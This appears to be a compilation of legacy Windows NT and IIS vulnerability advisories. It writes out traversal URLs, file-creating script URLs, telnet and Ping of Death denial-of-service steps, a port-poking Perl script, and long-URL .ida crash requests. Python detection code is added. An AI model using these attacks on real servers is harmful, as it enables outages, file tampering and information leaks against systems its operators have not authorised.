Affected systems: 4.0, IIS 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------

Affected systems: 4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' exists, the file will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.
----------------------------------------------------------------------

Affected systems: 3.51, 4.0
Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet

results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT Resource Kit):

/*begin poke code*/

use Socket;
use FileHandle;
require "chat2.pl";   # the old Perl chat library, provides chat::open_port/print/close

# Host to test, taken from the command line (perl poke servername).
$systemname = shift or die "usage: perl poke servername\n";

$verbose = 1;    # tell me what you're hitting
$knownports = 1; # don't hit known problem ports (53, 135, 1031)

# Port 0 is not a valid destination, so start at 1.
for ($port = 1; $port < 65535; $port++)
{
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    if ($verbose) {
        print "Trying port: $port\n";
    }
    $fh = chat::open_port($systemname, $port);
    next unless $fh;   # nothing listening on this port, move on
    # About ten characters followed by a carriage return, as in the telnet steps above.
    chat::print($fh, "This is about ten characters or more\n");
    chat::close($fh);
}

/*end poke code*/

Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------

Affected systems: 4.0
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------

Affected systems: 3.51, 4.0
Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable sending large packets, but does not crash on receiving large packets.
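As an added illustration in Python (not part of the original post), the reassembly-length check that separates the post's ping -l 65527 from a legal-sized ping: a fragment whose offset plus length would carry the reassembled datagram past the 65535-byte IPv4 maximum is the condition behind the Ping of Death. The fragment builder, the addresses and the 1500-byte MTU are constructed assumptions.

```python
"""Check whether an IPv4 fragment would push the reassembled datagram past 65535 bytes."""
import struct

IP_MAX_LEN = 65535   # largest datagram the 16-bit IPv4 total-length field can describe
IPV4_HDR_LEN = 20    # minimal IPv4 header; the 8-byte ICMP echo header follows it
ICMP_HDR_LEN = 8

def make_fragment(frag_offset, payload_len, more_fragments):
    """Build a constructed IPv4 fragment (minimal header plus a zero-filled payload).
    frag_offset is in bytes and must be a multiple of 8."""
    flags_frag = (0x2000 if more_fragments else 0) | (frag_offset // 8)
    header = struct.pack("!BBHHHBBH4s4s",
                         0x45, 0, IPV4_HDR_LEN + payload_len, 0x1234, flags_frag,
                         64, 1, 0, bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    return header + b"\x00" * payload_len

def fragment_end(pkt):
    """Offset just past this fragment's payload within the reassembled datagram."""
    ver_ihl, _tos, total_len, _ident, flags_frag = struct.unpack("!BBHHH", pkt[:8])
    ihl = (ver_ihl & 0x0F) * 4
    offset = (flags_frag & 0x1FFF) * 8
    return offset + (total_len - ihl)

def is_oversized_fragment(pkt):
    """True when header plus reassembled payload would exceed IP_MAX_LEN.
    A stack that trusts the offset without this check overruns its reassembly
    buffer, which is the TCPIP.SYS failure the STOP codes above report."""
    return IPV4_HDR_LEN + fragment_end(pkt) > IP_MAX_LEN

def last_fragment_of_ping(data_len, mtu=1500):
    """Last fragment of an ICMP echo carrying data_len bytes of data (the post's
    ping -l 65527), split at an Ethernet-sized MTU. Constructed, not captured."""
    icmp_len = ICMP_HDR_LEN + data_len
    per_frag = (mtu - IPV4_HDR_LEN) // 8 * 8          # 1480 payload bytes per fragment
    last_offset = (icmp_len // per_frag) * per_frag   # 65120 for the post's size
    return make_fragment(last_offset, icmp_len - last_offset, False)

if __name__ == "__main__":
    # 65507 is the largest data size that still fits; 65527 is the post's value.
    for data_len in (65507, 65527):
        print(data_len, is_oversized_fragment(last_fragment_of_ping(data_len)))
```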

--------------------------------------------------------------------------------

Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have two kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0).

When a remote attacker issues a URL request with the malformed URL http://www.example.com/...[25kb of '.']...ida, the server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive) by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq, a remote user will get a response that looks like:

'The IDQ d:\http\anything.idq could not be found'

Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server.
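As an added example (Python, not part of the original post), a classifier for web-server request lines that flags the request shapes described in this post: the ..\.. traversal and "GET ../.." crash, the scripts >PATH\target.bat output redirection and its %0A%0D form, the long-dot "ida" URL, and the .ida/.idq path-disclosure probe. The sample request lines and the rule names are constructed for the example.

```python
"""Flag HTTP request paths matching the IIS/NT issues described in this post."""
from urllib.parse import unquote

# Constructed sample request lines (method and path only), not real log data.
SAMPLE_REQUESTS = [
    "GET /default.htm",
    "GET /..\\..",
    "GET /scripts..\\..\\scriptname",
    "GET /scripts/exploit.bat>c:\\inetpub\\target.bat",
    "GET /scripts/script_name%0A%0D>c:\\inetpub\\target.bat",
    "GET /" + "." * 25000 + "ida",
    "GET /anything.idq",
]

def classify_path(path):
    """Return the names of the rules a single request path triggers."""
    findings = []
    decoded = unquote(path)       # so %2e%2e and %0A%0D forms are seen decoded
    lower = decoded.lower()
    if "..\\" in decoded or "../" in decoded:
        findings.append("traversal")            # browse outside the content root
    if lower.startswith("/scripts") and ">" in decoded:
        findings.append("output-redirect")      # '>PATH\target.bat' file creation
    if "\r" in decoded or "\n" in decoded:
        findings.append("crlf-in-path")         # the %0A%0D variant
    if lower.endswith("ida") and lower.count(".") > 255:
        findings.append("long-dot-ida")         # IIS 5.0 crash / directory leak
    elif lower.endswith((".ida", ".idq")):
        findings.append("ida-idq-probe")        # physical path disclosure
    return findings

def scan_requests(lines):
    """Return (line, findings) for every request line that triggers a rule."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 2:
            continue                            # malformed line, nothing to classify
        findings = classify_path(parts[1])
        if findings:
            hits.append((line, findings))
    return hits

if __name__ == "__main__":
    for line, findings in scan_requests(SAMPLE_REQUESTS):
        print(f"{', '.join(findings):30s} {line[:60]}")
```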